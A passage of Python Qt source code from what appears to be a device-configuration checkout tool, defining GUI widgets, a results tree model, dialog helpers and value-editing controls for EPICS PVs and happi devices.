low=summary.minimum,\n high=summary.maximum,\n )\n self.suggest_comparison.emit(comparison)\n\n def open_arch_viewer():\n arch_widget = get_archive_viewer()\n for datum in data:\n try:\n parent_dev = (datum.signal.parent\n or datum.signal.biological_parent)\n dev_attr = '.'.join((parent_dev.name, datum.attr))\n except Exception as e:\n logger.debug('unable to resolve full device-attribute '\n f'string: {e}')\n dev_attr = 'N/A'\n arch_widget.add_signal(\n datum.pvname, dev_attr=dev_attr, update_curves=False\n )\n arch_widget.update_curves()\n arch_widget.show()\n\n menu.addSection(\"Open Archive Data viewer\")\n archive_viewer_all = menu.addAction(\"View all selected in \"\n \"Archive Viewer\")\n archive_viewer_all.triggered.connect(open_arch_viewer)\n\n menu.addSection(\"Add all selected\")\n add_without_action = menu.addAction(\"Add selected without comparison\")\n add_without_action.triggered.connect(add_without)\n\n if summary.average is not None:\n add_with_equals_action = menu.addAction(\n f\"Add selected with Equals comparison (={summary.average})\"\n )\n add_with_equals_action.triggered.connect(add_with_equals)\n\n if summary.minimum is not None:\n add_with_range_action = menu.addAction(\n f\"Add selected with Range 
comparison \"\n f\"[{summary.minimum}, {summary.maximum}]\"\n )\n add_with_range_action.triggered.connect(add_with_range)\n\n menu.addSection(\"Add single attribute\")\n for attr in data:\n def add_single_attr(*, attr_name: str = attr.attr):\n self._add_item(attr_name)\n\n action = menu.addAction(f\"Add {attr.attr}\")\n action.triggered.connect(add_single_attr)\n\n return menu\n\n\nclass BulkListWidget(StringListWithDialog):\n \"\"\"\n String list widget that uses a multi-line text box for entry and edit.\n \"\"\"\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_multiline)\n self.item_edit_request.connect(self._open_multiline)\n\n def _open_multiline(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n User requested adding new strings or editing existing ones.\n\n Parameters\n ----------\n to_select : list of str, optional\n For editing, this will contain the string items that are\n selected so that we can pre-populate the edit box\n appropriately.\n \"\"\"\n to_select = to_select or []\n if to_select:\n title = 'Edit PVs Dialog'\n label = 'Add to or edit these PVs as appropriate:'\n text = '\\n'.join(to_select)\n else:\n title = 'Add PVs Dialog'\n label = 'Which PVs should be included?'\n text = ''\n user_input, ok = QInputDialog.getMultiLineText(\n self, title, label, text\n )\n if not ok:\n return\n new_pvs = [pv.strip() for pv in user_input.splitlines() if pv.strip()]\n self.edit_items(to_select, new_pvs)\n\n\nclass Toggle(QCheckBox):\n \"\"\"\n A checkbox widget that looks like a sliding toggle. At default:\n - The disabled state displays the slider as grey and to the left.\n - The activated state displays the slider as blue and to the right\n \"\"\"\n # shamelessly vendored from qtwidgets:\n # github.com/pythonguis/python-qtwidgets/tree/master/qtwidgets/toggle\n _transparent_pen = QPen(Qt.transparent)\n _light_grey_pen = QPen(Qt.lightGray)\n\n def __init__(\n self,\n *args,\n parent=None,\n bar_color=Qt.gray,\n checked_color=\"#00B0FF\",\n handle_color=Qt.white,\n checked_icon='msc.run-all',\n unchecked_icon='fa5s.edit',\n **kwargs\n ):\n super().__init__(*args, parent=parent, **kwargs)\n # Save our properties on the object via self, so we can access them later\n # in the paintEvent.\n self.checked_color = checked_color\n self.checked_icon = checked_icon\n self.unchecked_icon = unchecked_icon\n self._bar_brush = QBrush(bar_color)\n self._bar_checked_brush = QBrush(QColor(checked_color).lighter())\n\n self._handle_brush = QBrush(handle_color)\n self._handle_checked_brush = QBrush(QColor(checked_color))\n\n # Setup the rest of the widget.\n\n self.setContentsMargins(0, 0, 0, 0)\n self._handle_position = 0\n\n self.stateChanged.connect(self.handle_state_change)\n\n def sizeHint(self) -> QtCore.QSize:\n return QtCore.QSize(40, 25)\n\n def hitButton(self, pos: QPoint):\n return self.contentsRect().contains(pos)\n\n def paintEvent(self, e: QPaintEvent):\n contRect = self.contentsRect()\n handleRadius = round(0.45 * contRect.height())\n\n p = QPainter(self)\n p.setRenderHint(QPainter.Antialiasing)\n\n p.setPen(self._transparent_pen)\n barRect = QRectF(\n 0, 0,\n contRect.width() - handleRadius, 0.40 * contRect.height()\n )\n barRect.moveCenter(contRect.center())\n rounding = barRect.height() / 2\n\n # the handle will move along this line\n trailLength = contRect.width() - 2 * handleRadius\n xPos = contRect.x() + handleRadius + trailLength * self._handle_position\n iconRad = int(0.7 * handleRadius)\n # center of handle\n icon_x = 
int(xPos - (1.3 * handleRadius) + (1.3 * iconRad))\n iconRect = QRect(\n QPoint(icon_x, round(barRect.center().y()) - iconRad),\n QSize(2 * iconRad, 2 * iconRad)\n )\n\n if self.isChecked():\n p.setBrush(self._bar_checked_brush)\n p.drawRoundedRect(barRect, rounding, rounding)\n p.setBrush(self._handle_checked_brush)\n p.drawEllipse(\n QPointF(xPos, barRect.center().y()),\n handleRadius, handleRadius\n )\n icon = qta.icon(self.checked_icon,\n color=QColor(self.checked_color).darker())\n icon.paint(p, iconRect)\n\n else:\n p.setBrush(self._bar_brush)\n p.drawRoundedRect(barRect, rounding, rounding)\n p.setPen(self._light_grey_pen)\n p.setBrush(self._handle_brush)\n p.drawEllipse(\n QPointF(xPos, barRect.center().y()),\n handleRadius, handleRadius\n )\n icon = qta.icon(self.unchecked_icon)\n icon.paint(p, iconRect)\n\n p.end()\n\n @QtCore.Slot(int)\n def handle_state_change(self, value):\n self._handle_position = 1 if value else 0\n\n @QtCore.Property(float)\n def handle_position(self):\n return self._handle_position\n\n @handle_position.setter\n def handle_position(self, pos):\n \"\"\"change the property\n we need to trigger QWidget.update() method, either by:\n 1- calling it here [ what we're doing ].\n 2- connecting the QPropertyAnimation.valueChanged() signal to it.\n \"\"\"\n self._handle_position = pos\n self.update()\n\n\ndef user_string_to_bool(text: str) -> bool:\n \"\"\"\n Interpret a user's input as a boolean value.\n\n Strings like \"true\" should evaluate to True, strings\n like \"fa\" should evaluate to False, numeric inputs like\n 1 or 2 should evaluate to True, numeric inputs like 0 or\n 0.0 should evaluate to False, etc.\n\n Parameters\n ----------\n text : str\n The user's text input as a string. This is usually\n the value directly from a line edit widget.\n \"\"\"\n if not text:\n return False\n try:\n if text[0].lower() in ('n', 'f', '0'):\n return False\n except (IndexError, AttributeError):\n # Not a string, let's be slightly helpful\n return bool(text)\n return True\n\n\ndef setup_line_edit_data(\n line_edit: QLineEdit,\n value_obj: QDataclassValue,\n from_str: Callable[[str], Any],\n to_str: Callable[[Any], str],\n) -> None:\n \"\"\"\n Setup a line edit for bilateral data exchange with a bridge.\n\n Parameters\n ----------\n line_edit : QLineEdit\n The line edit to set up.\n value_obj : QDataclassValue\n The bridge member that has the value we care about.\n from_str : callable\n A callable from str to the dataclass value. This is used\n to interpret the contents of the line edit.\n to_str : callable\n A callable from the dataclass value to str. This is used\n to fill the line edit when the dataclass updates.\n \"\"\"\n def update_dataclass(text: str) -> None:\n try:\n value = from_str(text)\n except ValueError:\n return\n value_obj.put(value)\n\n def update_widget(value: Any) -> None:\n if not line_edit.hasFocus():\n try:\n text = to_str(value)\n except ValueError:\n return\n line_edit.setText(text)\n\n starting_value = value_obj.get()\n starting_text = to_str(starting_value)\n line_edit.setText(starting_text)\n line_edit.textEdited.connect(update_dataclass)\n value_obj.changed_value.connect(update_widget)\n\n\ndef describe_comparison_context(attr: str, config: Configuration) -> str:\n \"\"\"\n Describe in words what value or values we are comparing to.\n\n Parameters\n ----------\n attr : str\n The attribute, pvname, or other string identifier we are going\n to compare to. 
This can also be 'shared'.\n config : Configuration\n Typically a DeviceConfiguration, PVConfiguration, or\n ToolConfiguration that has the contextual information for\n understanding attr.\n \"\"\"\n if not attr:\n return 'Error loading context information'\n if isinstance(config, DeviceConfiguration):\n num_devices = len(config.devices)\n if num_devices == 0:\n return 'Invalid comparison to zero devices'\n if attr == 'shared':\n num_signals = len(config.by_attr)\n if num_signals == 0:\n return 'Invalid comparison to zero signals'\n if num_devices == 1 and num_signals == 1:\n # device_name.signal_name\n return (\n f'Comparison to value of {config.devices[0]}.'\n f'{list(config.by_attr)[0]}'\n )\n if num_devices > 1 and num_signals == 1:\n return (\n f'Comparison to value of {list(config.by_attr)[0]} '\n f'signal on each of {num_devices} devices'\n )\n if num_devices == 1 and num_signals > 1:\n return (\n f'Comparison to value of {num_signals} '\n f'signals on {config.devices[0]}'\n )\n return (\n f'Comparison to value of {num_signals} signals '\n f'on each of {num_devices} devices'\n )\n # Must be one specific signal\n if num_devices == 1:\n # device_name.signal_name\n return f'Comparison to value of {config.devices[0]}.{attr}'\n return (\n f'Comparison to value of {attr} '\n f'on each of {num_devices} devices'\n )\n if isinstance(config, PVConfiguration):\n if attr == 'shared':\n num_pvs = len(config.by_pv)\n if num_pvs == 0:\n return 'Invalid comparison to zero PVs'\n if num_pvs == 1:\n return f'Comparison to value of {list(config.by_pv)[0]}'\n return f'Comparison to value of each of {num_pvs} pvs'\n return f'Comparison to value of {attr}'\n if isinstance(config, ToolConfiguration):\n if isinstance(config.tool, Ping):\n num_hosts = len(config.tool.hosts)\n if num_hosts == 0:\n return 'Invalid comparison to zero ping hosts'\n if attr == 'shared':\n if num_hosts == 1:\n return (\n 'Comparison to all different results from pinging '\n f'{config.tool.hosts[0]}'\n )\n return (\n 'Comparison to all different results from pinging '\n f'{num_hosts} hosts'\n )\n if num_hosts == 1:\n return (\n f'Comparison to {attr} result '\n f'from pinging {config.tool.hosts[0]}'\n )\n return (\n f'Comparison to {attr} result from pinging {num_hosts} hosts'\n )\n return 'Comparison to unknown tool results'\n return 'Invalid comparison'\n\n\ndef describe_step_context(attr: str, step: ProcedureStep) -> str:\n # TODO: actually write this method\n # may not need attr, since ProcedureSteps are flatter\n # Will have to be expanded with each new step type\n return ''\n\n\ndef get_relevant_pvs(\n attr: str,\n config: Configuration\n) -> List[Tuple[str, str]]:\n \"\"\"\n Get the pvs and corresponding attribute name for the provided comparison.\n\n Parameters\n ----------\n attr : str\n The attribute, pvname or other string identifier to compare to.\n This can also be 'shared'\n config : Configuration\n Typically a DeviceConfiguration, PVConfiguration, or\n ToolConfiguration that has the contextual information for\n understanding attr.\n Returns\n -------\n List[Tuple[str, str]]\n A list of tuples (PV:NAME, device.attr.name) containing the\n relevant pv information\n \"\"\"\n if isinstance(config, PVConfiguration):\n # we have raw PV's here, with no attrs\n return [(pv, None) for pv in config.by_pv.keys()]\n if isinstance(config, DeviceConfiguration):\n pv_list = []\n if attr == 'shared':\n # Use all pvs in the config\n attrs = config.by_attr.keys()\n else:\n attrs = list([attr])\n for device_name in config.devices:\n 
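# each device is resolved through happi once; attrs that raise or lack a pvname are skipped below, so only attrs exposing a pvname are collected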
dev = util.get_happi_device_by_name(device_name)\n for curr_attr in attrs:\n try:\n pv = getattr(getattr(dev, curr_attr), 'pvname', None)\n except AttributeError:\n continue\n if pv:\n pv_list.append((pv, device_name + '.' + curr_attr))\n\n return pv_list\n\n\ndef cast_dataclass(data: Any, new_type: Type) -> Any:\n \"\"\"\n Convert one dataclass to another, keeping values in any same-named fields.\n\n Parameters\n ----------\n data : Any dataclass instance\n The dataclass instance that we'd like to convert.\n new_type : Any dataclass\n The dataclass type that we'd like to convert.\n\n Returns\n -------\n casted_data : instance of new_type\n The new dataclass instance.\n \"\"\"\n data_fields = dataclasses.fields(data)\n new_fields = dataclasses.fields(new_type)\n field_names = set(field.name for field in new_fields)\n new_kwargs = {\n dfield.name: getattr(data, dfield.name) for dfield in data_fields\n if dfield.name in field_names\n }\n return new_type(**new_kwargs)\n\n\nclass MultiInputDialog(QtWidgets.QDialog):\n \"\"\"\n Generates a dialog widget for requesting an arbitrary number of\n pieces of information. Selects the input widget type based on the\n initial data type.\n\n To retrieve the user provided data, call MultiInputDialog.get_info()\n \"\"\"\n def __init__(\n self,\n *args,\n init_values: Dict[str, Any],\n units: Optional[List[str]] = None,\n **kwargs\n ):\n super().__init__(*args, **kwargs)\n\n self.init_values = init_values\n self.units = units\n vlayout = QtWidgets.QVBoxLayout(self)\n self.grid_layout = QtWidgets.QGridLayout()\n # add each name and field\n for i, (key, value) in enumerate(init_values.items()):\n spaced_key = key.replace('_', ' ')\n self.grid_layout.addWidget(self.make_label(spaced_key), i, 0)\n self.grid_layout.addWidget(self.make_field(value), i, 1)\n if self.units:\n try:\n unit_label = QtWidgets.QLabel(self.units[i])\n except IndexError:\n continue\n self.grid_layout.addWidget(unit_label, i, 2)\n\n vlayout.addLayout(self.grid_layout)\n\n # add ok, cancel buttons\n self.button_box = QtWidgets.QDialogButtonBox(\n QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel\n )\n self.ok_button = self.button_box.button(QtWidgets.QDialogButtonBox.Ok)\n self.cancel_button = self.button_box.button(QtWidgets.QDialogButtonBox.Cancel)\n\n vlayout.addWidget(self.button_box)\n self.ok_button.clicked.connect(self.accept)\n self.cancel_button.clicked.connect(self.reject)\n\n def make_label(self, key: str) -> QtWidgets.QLabel:\n return QtWidgets.QLabel(key)\n\n def make_field(self, value: Any) -> QtWidgets.QWidget:\n \"\"\"\n Make an input field widget for the given value based on its type\n\n Parameters\n ----------\n value : Any\n The default value to make a input field for\n\n Returns\n -------\n QtWidgets.QWidget\n The input field widget\n \"\"\"\n # no newlines allowed\n regexp = QRegularExpression(r'[^\\n]*')\n if isinstance(value, str):\n # make text edit\n text_edit = QtWidgets.QLineEdit()\n validator = QRegularExpressionValidator(regexp)\n text_edit.setMaximumHeight(30)\n text_edit.setPlaceholderText(value)\n text_edit.setValidator(validator)\n return text_edit\n elif isinstance(value, int):\n int_edit = QtWidgets.QSpinBox()\n int_edit.setMinimum(-1)\n int_edit.setSpecialValueText('None')\n int_edit.setToolTip('Input -1 to set value to None')\n int_edit.setValue(value)\n return int_edit\n elif isinstance(value, float):\n float_edit = QtWidgets.QDoubleSpinBox()\n float_edit.setMinimum(-1)\n float_edit.setSpecialValueText('None')\n 
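# as in the int branch above, -1 renders as 'None' and (per the tooltip below) is the documented way to request an unset value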
float_edit.setToolTip('Input -1 to set value to None')\n float_edit.setValue(value)\n return float_edit\n else:\n raise RuntimeError(f\"Unexpected value {value} of type {type(value).__name__}\")\n\n def get_info(self) -> Dict[str, Any]:\n \"\"\"\n Collect user provided information. Returns default values\n provided to the widget at initialization if the user has not\n entered any data.\n \"\"\"\n info = {}\n for r in range(self.grid_layout.rowCount()):\n key = self.grid_layout.itemAtPosition(r, 0).widget().text()\n input_widget = self.grid_layout.itemAtPosition(r, 1).widget()\n if isinstance(input_widget, QtWidgets.QLineEdit):\n value = input_widget.text()\n elif isinstance(input_widget,\n (QtWidgets.QSpinBox, QtWidgets.QDoubleSpinBox)):\n value = input_widget.value()\n\n unspaced_key = key.replace(' ', '_')\n # replace with default value if no input\n info[unspaced_key] = value or self.init_values[unspaced_key]\n\n return info\n\n\ndef clear_results(config_file: PreparedFile | ProcedureFile) -> None:\n if isinstance(config_file, ProcedureFile):\n # clear all results when making a new run tree\n for step in walk_steps(config_file.root):\n step.step_result = incomplete_result()\n step.verify_result = incomplete_result()\n step.combined_result = incomplete_result()\n\n elif isinstance(config_file, PreparedFile):\n for comp in config_file.walk_comparisons():\n comp.result = incomplete_result()\n for group in config_file.walk_groups():\n group.result = incomplete_result()\n\n\nclass ConfigTreeModel(QtCore.QAbstractItemModel):\n \"\"\"\n Item model for tree data. Goes through all this effort due to the need for\n tooltips, icons, etc. This model is READ-ONLY, and does not implement\n the ``setData`` method.\n\n Expects the item to be specifically a TreeItem, which each holds a\n Configuration or Comparison\n \"\"\"\n def __init__(self, *args, data: TreeItem, **kwargs):\n super().__init__(*args, **kwargs)\n self.tree_data = data or TreeItem()\n self.root_item = self.tree_data\n self.headers = ['Name', 'Status', 'Type']\n\n def headerData(\n self,\n section: int,\n orientation: Qt.Orientation,\n role: int\n ) -> Any:\n \"\"\"\n Returns the header data for the model.\n Currently only displays horizontal header data\n\n Parameters\n ----------\n section : int\n section to provide header information for\n orientation : Qt.Orientation\n header orientation, Qt.Horizontal or Qt.Vertical\n role : int\n Qt role to provide header information for\n\n Returns\n -------\n Any\n requested header data\n \"\"\"\n if role != Qt.DisplayRole:\n return\n\n if orientation == Qt.Horizontal:\n return self.headers[section]\n\n def index(\n self,\n row: int,\n column: int,\n parent: QtCore.QModelIndex = None\n ) -> QtCore.QModelIndex:\n \"\"\"\n Returns the index of the item in the model.\n\n In a tree view the rows are defined relative to parent item. 
If an\n item is the first child under its parent, it will have row=0,\n regardless of the number of items in the tree.\n\n Parameters\n ----------\n row : int\n The row of the requested index.\n column : int\n The column of the requested index\n parent : QtCore.QModelIndex, optional\n The parent of the requested index, by default None\n\n Returns\n -------\n QtCore.QModelIndex\n \"\"\"\n if not self.hasIndex(row, column, parent):\n return QtCore.QModelIndex()\n\n parent_item = None\n if not parent or not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n\n child_item = parent_item.child(row)\n if child_item:\n return self.createIndex(row, column, child_item)\n\n # all else\n return QtCore.QModelIndex()\n\n def parent(self, index: QtCore.QModelIndex) -> QtCore.QModelIndex:\n \"\"\"\n Returns the parent of the given model item.\n\n Parameters\n ----------\n index : QtCore.QModelIndex\n item to retrieve parent of\n\n Returns\n -------\n QtCore.QModelIndex\n index of the parent item\n \"\"\"\n if not index.isValid():\n return QtCore.QModelIndex()\n child = index.internalPointer()\n parent = child.parent()\n if parent == self.root_item:\n return QtCore.QModelIndex()\n\n return self.createIndex(parent.row(), 0, parent)\n\n def rowCount(self, parent: QtCore.QModelIndex) -> int:\n \"\"\"\n Called by tree view to determine number of children an item has.\n\n Parameters\n ----------\n parent : QtCore.QModelIndex\n index of the parent item being queried\n\n Returns\n -------\n int\n number of children ``parent`` has\n \"\"\"\n if not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n return parent_item.childCount()\n\n def columnCount(self, parent: QtCore.QModelIndex) -> int:\n \"\"\"\n Called by tree view to determine number of columns of data ``parent`` has\n\n Parameters\n ----------\n parent : QtCore.QModelIndex\n\n Returns\n -------\n int\n number of columns ``parent`` has\n \"\"\"\n if not parent.isValid():\n parent_item = self.root_item\n else:\n parent_item = parent.internalPointer()\n return parent_item.columnCount()\n\n def data(self, index: QtCore.QModelIndex, role: int) -> Any:\n \"\"\"\n Returns the data stored under the given ``role`` for the item\n referred to by the ``index``. 
Uses and assumes ``TreeItem`` methods.\n\n Parameters\n ----------\n index : QtCore.QModelIndex\n index that identifies the portion of the model in question\n role : int\n the data role\n\n Returns\n -------\n Any\n The data to be displayed by the model\n \"\"\"\n if not index.isValid():\n return None\n\n item = index.internalPointer()\n # special handling for status info\n if index.column() == 1:\n if role == Qt.ForegroundRole:\n brush = QBrush()\n brush.setColor(item.data(index.column())[1])\n return brush\n if role == Qt.DisplayRole:\n return item.data(1)[0]\n if role == Qt.TextAlignmentRole:\n return Qt.AlignCenter\n\n if role == Qt.ToolTipRole:\n return item.tooltip()\n if role == Qt.DisplayRole:\n return item.data(index.column())\n\n return None\n\n\nclass TreeItem:\n \"\"\"\n Node in a tree representation of a passive checkout.\n\n Each node takes a Configuration or Comparison, and provides ``ConfigTreeModel``\n information from it.\n\n If ``prepared_data`` is provided, Result information can be provided to the\n model via the ``.data()`` method\n \"\"\"\n result_icon_map = {\n # check mark\n Severity.success: ('\\u2713', QColor(0, 128, 0, 255)),\n Severity.warning: ('?', QColor(255, 165, 0, 255)),\n # x mark\n Severity.internal_error: ('\\u2718', QColor(255, 0, 0, 255)),\n Severity.error: ('\\u2718', QColor(255, 0, 0, 255))\n }\n\n def __init__(\n self,\n data: Union[Configuration, Comparison],\n prepared_data: Optional[List[Union[PreparedConfiguration, PreparedComparison]]] = None\n ) -> None:\n self._data = data\n self.prepared_data = prepared_data\n self.combined_result = None\n self._columncount = 3\n self._children: List[TreeItem] = []\n self._parent = None\n self._row = 0\n\n def data(self, column: int) -> Any:\n \"\"\"\n Return the data for the requested column.\n Column 0: name\n Column 1: (status icon, color)\n Column 2: type\n\n Parameters\n ----------\n column : int\n data column requested\n\n Returns\n -------\n Any\n \"\"\"\n if column == 0:\n return self._data.name\n elif column == 1:\n if self.prepared_data:\n prep_results = [d.result for d in self.prepared_data]\n self.combined_result = combine_results(prep_results)\n icon_data = self.result_icon_map[self.combined_result.severity]\n return icon_data\n else:\n return self.result_icon_map[Severity.internal_error]\n elif column == 2:\n return type(self._data).__name__\n\n def tooltip(self) -> str:\n \"\"\" Construct the tooltip based on the stored result \"\"\"\n if self.combined_result:\n reason = self.combined_result.reason\n return reason.strip('[]').replace(', ', '\\n')\n return ''\n\n def columnCount(self) -> int:\n \"\"\" Return the item's column count \"\"\"\n return self._columncount\n\n def childCount(self) -> int:\n \"\"\" Return the item's child count \"\"\"\n return len(self._children)\n\n def child(self, row: int) -> TreeItem:\n \"\"\" Return the item's child \"\"\"\n if row >= 0 and row < self.childCount():\n return self._children[row]\n\n def parent(self) -> TreeItem:\n \"\"\" Return the item's parent \"\"\"\n return self._parent\n\n def row(self) -> int:\n \"\"\" Return the item's row under its parent \"\"\"\n return self._row\n\n def addChild(self, child: TreeItem) -> None:\n \"\"\"\n Add a child to this item.\n\n Parameters\n ----------\n child : TreeItem\n Child TreeItem to add to this TreeItem\n \"\"\"\n child._parent = self\n child._row = len(self._children)\n self._children.append(child)\n self._columncount = max(child.columnCount(), self._columncount)\n\n\nclass AddRowWidget(DesignerDisplay, 
QWidget):\n \"\"\"\n A simple row widget with an add button. To be used when space is precious\n Connect a new-row slot to the add_button signal to create new rows\n \"\"\"\n filename = 'add_row_widget.ui'\n\n add_button: QtWidgets.QToolButton\n row_label: QtWidgets.QLabel\n\n def __init__(self, *args, text='Add new row', **kwargs):\n super().__init__(*args, **kwargs)\n self.add_button.setIcon(qta.icon('ri.add-circle-line'))\n self.row_label.setText(text)\n\n\nclass TableWidgetWithAddRow(QtWidgets.QTableWidget):\n \"\"\"\n A standard QTableWidget with an AddRowWidget.\n Intended to be a n x 1 table, with each row being a SimpleRowWidget.\n allows drag-and-drop to re-order rows\n Emits table_updated when the table contents change.\n\n use .add_row() to initialize a new row with an optional dataclass.\n\n The AddRowWidget is not treated as a row, and as such the following methods\n are modified.\n - rowCount(): Returns super().rowCount() - 1\n - ... and more as I find more methods\n \"\"\"\n # TODO: try setting up drag-drop functionality at some point.\n add_row_widget: AddRowWidget\n\n table_updated: ClassVar[QtCore.Signal] = QtCore.Signal()\n row_interacted: ClassVar[QtCore.Signal] = QtCore.Signal(int)\n\n def __init__(self, *args, add_row_text: str, title_text: str, row_widget_cls: QtWidgets.QWidget, **kwargs):\n super().__init__(*args, **kwargs)\n\n # self.dropEvent = self.table_drop_event\n self.setColumnCount(1)\n self.horizontalHeader().setStretchLastSection(True)\n self.setHorizontalHeaderLabels([title_text])\n self.verticalHeader().setHidden(True)\n self.row_widget_cls = row_widget_cls\n self.add_row_text = add_row_text\n self.add_add_row_widget(text=add_row_text)\n self.setSelectionMode(self.NoSelection)\n self.table_updated.connect(self.stash_row_numbers)\n self.row_interacted.connect(lambda row_num: self.selectRow(row_num))\n\n def add_add_row_widget(self, text: str):\n \"\"\" add the AddRowWidget to the end of the specified table-widget\"\"\"\n self.add_row_widget = AddRowWidget(text=text)\n self.insertRow(0)\n self.setRowHeight(0, self.add_row_widget.sizeHint().height())\n self.setCellWidget(0, 0, self.add_row_widget)\n self.add_row_widget.add_button.clicked.connect(self.add_row)\n\n def rowCount(self) -> int:\n # exclude add-row in row counts\n return super().rowCount() - 1\n\n def add_row(\n self,\n checked: bool = False,\n data: Optional[Any] = None,\n **kwargs\n ) -> None:\n \"\"\"\n add a new or existing action to the table.\n\n Parameters\n ----------\n checked : bool, optional\n Unused. Button \"clicked\" signals often pass this as the first\n positional argument, by default False\n data : Optional[Any], optional\n a Dataclass to initialize the row with, by default None\n used in initializing the table, not in callbacks\n \"\"\"\n new_row = self.row_widget_cls(data=data)\n # Insert just above the add-row-row\n ins_ind = self.rowCount()\n self.insertRow(ins_ind)\n self.setRowHeight(ins_ind, new_row.sizeHint().height())\n self.setCellWidget(ins_ind, 0, new_row)\n self.setup_delete_button(new_row)\n self.table_updated.emit()\n\n def setup_delete_button(self, row: QtWidgets.QWidget) -> None:\n \"\"\"\n Set up the delete button for the specified row. 
Assumes `row.delete_button`\n is a QPushButton\n\n Parameters\n ----------\n row : QtWidgets.QWidget\n A row widget with a QPushButton in the .delete_button field\n \"\"\"\n # row: SimpleRowWidget, but can't import due to module structure\n delete_icon = self.style().standardIcon(\n QtWidgets.QStyle.SP_TitleBarCloseButton\n )\n row.delete_button.setIcon(delete_icon)\n\n def inner_delete(*args, **kwargs):\n self.delete_table_row(row)\n\n row.delete_button.clicked.connect(inner_delete)\n\n def delete_table_row(self, row: QtWidgets.QWidget) -> None:\n \"\"\" slot for a row's delete button. Removes it from this table. \"\"\"\n # get the data\n for row_index in range(self.rowCount()):\n widget = self.cellWidget(row_index, 0)\n if widget is row:\n self.removeRow(row_index)\n break\n\n self.table_updated.emit()\n\n def stash_row_numbers(self, *args, **kwargs):\n \"\"\" Stash row numbers in row widgets \"\"\"\n for row_num in range(self.rowCount()):\n row_widget = self.cellWidget(row_num, 0)\n row_widget.row_num = row_num\n\n def clearContents(self):\n super().clearContents()\n self.setRowCount(0)\n self.add_add_row_widget(text=self.add_row_text)\n\n\ndef set_widget_font_size(widget: QWidget, size: int):\n font = widget.font()\n font.setPointSize(size)\n widget.setFont(font)\n\n\ndef valid_float_string(string):\n try:\n float(string)\n except ValueError:\n return False\n return True\n\n\nclass ScientificDoubleSpinBox(QDoubleSpinBox):\n \"\"\"\n A double spinbox that supports scientific notation\n Thanks to jdreaver (https://gist.github.com/jdreaver/0be2e44981159d0854f5)\n for doing the hard work\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setMinimum(-np.inf)\n self.setMaximum(np.inf)\n self.setDecimals(1000)\n\n def validate(self, text, position):\n if valid_float_string(text):\n return (QValidator.Acceptable, text, position)\n if text == \"\" or text[position-1] in 'e.-+':\n return (QValidator.Intermediate, text, position)\n return (QValidator.Invalid, text, position)\n\n def fixup(self, text):\n try:\n value = float(text)\n except ValueError:\n return \"\"\n return value\n\n def valueFromText(self, text):\n return float(text)\n\n def textFromValue(self, value):\n return str(float(value))\n\n def stepBy(self, steps):\n text = self.cleanText()\n if 'e' in text:\n decimal, exp = text.split('e')\n else:\n decimal = text\n exp = None\n decimal = float(decimal)\n decimal += steps\n new_string = \"{:g}\".format(decimal) + (f'e{exp}' if exp else \"\")\n self.lineEdit().setText(new_string)\n\n\nclass EditMode(IntEnum):\n BOOL = 0\n ENUM = 1\n FLOAT = 2\n INT = 3\n STR = 4\n EPICS = 5\n HAPPI = 6\n\n\nclass MultiModeValueEdit(DesignerDisplay, QWidget):\n \"\"\"\n Widget to edit a single value/dynamic value pair. This widget contains a\n set of various edit widgets that will be connected to the corresponding\n QDataclassValue instances as appropriate. On first load we will match the\n data type of the saved value (or of the default value). The user will be\n able to pick a different input method via the mode select button and the\n appropriate input widget will be shown. This is intended to be used to\n edit the \"value\" and \"dynamic_value\" attributes of \"Comparison\" classes and\n of similar constructs. 
Some of the modes will edit the \"dynamic_value\" and\n others will edit the plain normal \"value\".\n\n Parameters\n ----------\n bridge : QDataclassBridge\n The bridge to the \"Comparison\" data class.\n value_name : str, optional\n The attribute name of the static value to edit.\n Defaults to \"value\".\n dynamic_name : str, optional\n The attribute name of the dynamic value to edit.\n Defaults to \"value_dynamic\".\n ids : QDataclassValue, optional\n The value object that will give us the list of ids (pvnames, devices)\n that are active for this comparison. This is needed to establish enum\n options.\n devices : QDataclassValue, optional\n The value object that will contain the list of device names if this is\n part of a device config. This is needed to establish enum options. If\n omitted, we'll treat ids as a list of PVs.\n font_pt_size : int, optional\n The size of the font to use for the widget.\n \"\"\"\n filename = 'multi_mode_value_edit.ui'\n show_tolerance: ClassVar[QSignal] = QSignal(bool)\n refreshed: ClassVar[QSignal] = QSignal()\n\n # Input widgets\n select_mode_button: QToolButton\n bool_input: QComboBox\n enum_input: QComboBox\n epics_widget: QWidget\n epics_input: QLineEdit\n epics_value_preview: QLabel\n epics_refresh: QToolButton\n happi_widget: QWidget\n happi_select_component: QPushButton\n happi_value_preview: QLabel\n happi_refresh: QToolButton\n float_input: ScientificDoubleSpinBox\n int_input: QSpinBox\n str_input: QLineEdit\n\n # metadata\n bridge: QDataclassBridge\n value_name: str\n value: QDataclassValue\n dynamic_name: str\n dynamic_value: QDataclassValue\n dynamic_bridge: Optional[QDataclassBridge]\n ids: Optional[QDataclassValue]\n devices: Optional[QDataclassValue]\n happi_select_widget: Optional[HappiDeviceComponentWidget]\n _last_device_name: str\n _is_number: bool\n _prep_dynamic_thread: Optional[ThreadWorker]\n\n def __init__(\n self,\n bridge: QDataclassBridge,\n value_name: str = 'value',\n dynamic_name: str = 'value_dynamic',\n id_fn: Optional[Callable] = None,\n devices: Optional[list[str]] = None,\n font_pt_size: int = 8,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.bridge = bridge\n self.value_name = value_name\n self.value = getattr(bridge, value_name)\n self.dynamic_name = dynamic_name\n self.dynamic_value = getattr(bridge, dynamic_name)\n self.dynamic_bridge = None\n self.id_fn = id_fn\n self.ids = self.id_fn()\n self.devices = devices\n self.font_pt_size = font_pt_size\n self.happi_select_widget = None\n self._last_device_name = \"\"\n self._is_number = False\n self._show_tol = False\n self._prep_dynamic_thread = None\n self._partial_slots: list[WeakPartialMethodSlot] = []\n self.setup_widgets()\n self.set_mode_from_data()\n self.setSizePolicy(\n QSizePolicy(\n QSizePolicy.Maximum,\n QSizePolicy.Maximum,\n )\n )\n\n def setup_widgets(self):\n \"\"\"\n Connect widgets to edit data classes as appropriate.\n \"\"\"\n # Data connections and style\n self.bool_input.activated.connect(self.update_from_bool)\n 